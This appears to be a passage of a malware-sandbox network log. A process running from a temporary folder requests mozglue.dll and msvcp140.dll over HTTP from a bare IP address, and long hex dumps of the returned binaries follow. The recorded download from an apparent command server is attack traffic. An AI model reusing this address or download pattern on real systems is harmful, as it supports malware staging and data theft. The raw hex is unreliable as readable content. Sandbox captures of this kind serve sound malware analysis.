2024-05-26 08:31:20 UTC	16384	IN	Data Raw: 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1 08 89 cb 89 4d f0 8d 14 3e 81 c2 31 23 43 e4 0f Data Ascii: ^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?UuM>1#C
2024-05-26 08:31:21 UTC	16384	IN	Data Raw: 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f 01 00 00 77 12 31 c0 81 f9 00 01 00 00 0f 93 c0 Data Ascii: }EPYEPYEPYFMPQW\|EppEPH[FMPQuo=EppEPN@w,0w w1
2024-05-26 08:31:21 UTC	16384	IN	Data Raw: 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 00 c7 85 7c ff ff ff 00 00 00 00 c7 85 6c ff ff Data Ascii: $`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE\|l
2024-05-26 08:31:21 UTC	16384	IN	Data Raw: 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff 89 f0 f7 65 f0 89 95 28 ff ff ff 89 85 30 ff ff Data Ascii: eLXee0@eeeue0UEeeUeee $e(0
2024-05-26 08:31:21 UTC	16384	IN	Data Raw: 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 45 e8 ff 8d 1c 18 89 7d e4 83 d3 00 0f 92 45 8c Data Ascii: MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEEE}E
2024-05-26 08:31:21 UTC	16384	IN	Data Raw: ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 89 b5 28 ff ff ff 8b b5 04 ff ff ff 81 e6 ff ff Data Ascii: 0<48%8A)$(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49760	65.109.242.59	443	6716	C:\Users\user\AppData\Local\Temp\kat2225.tmp

Timestamp	Bytes transferred	Direction	Data
2024-05-26 08:31:22 UTC	173	OUT	GET /mozglue.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Cache-Control: no-cache
2024-05-26 08:31:23 UTC	246	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 26 May 2024 08:31:22 GMT Content-Type: application/octet-stream Content-Length: 608080 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-94750" Accept-Ranges: bytes
2024-05-26 08:31:23 UTC	16138	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
2024-05-26 08:31:23 UTC	16384	IN	Data Raw: ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00 c7 46 4c 00 00 00 00 c7 46 50 0f 00 00 00 c6 46 Data Ascii: A$P~#HbA$P~#HUVuF\|FlNhFdFhFTNPFLFPF
2024-05-26 08:31:23 UTC	16384	IN	Data Raw: 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c ff ff ff 56 e8 de bc ff ff 89 f1 89 fa e8 d5 f1 Data Ascii: PzEPWxP1`PHP$,FM1R'^_[]00L9tc<V
2024-05-26 08:31:23 UTC	16384	IN	Data Raw: 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9 1f 85 eb 51 89 f0 f7 e1 89 d1 c1 e9 05 89 c8 ba Data Ascii: )0LY)0LZ\|!i(0C}L8!i(0u9Gu)0E8)0}LQ
2024-05-26 08:31:23 UTC	16384	IN	Data Raw: 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89 06 8b 45 ec 89 46 08 e9 8b fe ff ff 68 a7 fa 07 Data Ascii: 1B]zB\|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSREEFh
2024-05-26 08:31:23 UTC	16384	IN	Data Raw: 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8 Data Ascii: H) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) sUSWV
2024-05-26 08:31:23 UTC	16384	IN	Data Raw: 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34 83 f9 08 8b 7c 24 08 0f 83 b0 03 00 00 85 db 0f Data Ascii: D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F\|$4rD$ D$ WVjjPS,VL$4\|$
2024-05-26 08:31:23 UTC	16384	IN	Data Raw: 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c 24 89 7c 24 08 8b 4b 08 89 0c 24 89 53 04 0f a4 Data Ascii: D$4P<\|$\$t@)GD$ P08z.Jt_@u`\|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<$\|$K$S
2024-05-26 08:31:23 UTC	16384	IN	Data Raw: 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b 10 83 e2 fe 83 e1 01 09 d1 89 4e 04 89 30 8b 4b Data Ascii: XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKNN0K
2024-05-26 08:31:23 UTC	16384	IN	Data Raw: c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48 85 c0 0f 84 c2 09 00 00 80 60 04 fe 8b 4c 24 0c Data Ascii: rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H`L$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49761	65.109.242.59	443	6716	C:\Users\user\AppData\Local\Temp\kat2225.tmp

Timestamp	Bytes transferred	Direction	Data
2024-05-26 08:31:24 UTC	174	OUT	GET /msvcp140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Cache-Control: no-cache
2024-05-26 08:31:25 UTC	246	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 26 May 2024 08:31:25 GMT Content-Type: application/octet-stream Content-Length: 450024 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-6dde8" Accept-Ranges: bytes
2024-05-26 08:31:25 UTC	16138	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
2024-05-26 08:31:25 UTC	16384	IN	Data Raw: 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d 00 72 00 2d 00 69 00 6e 00 00 00 6d 00 73 00 2d Data Ascii: hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnmr-inms-
2024-05-26 08:31:25 UTC	16384	IN	Data Raw: 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 c8 8b 00 10 00 Data Ascii: {\|L@DX}0}}M@4}0}}4M@tXM}0}}XM@
2024-05-26 08:31:25 UTC	16384	IN	Data Raw: c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45 fc dd e2 df e0 dd da f6 c4 44 7b 49 d9 c2 d8 c1 Data Ascii: E]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u\|_E^UQQMuU]EDB]ED{nt]B]ED{I
2024-05-26 08:31:25 UTC	16384	IN	Data Raw: f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e 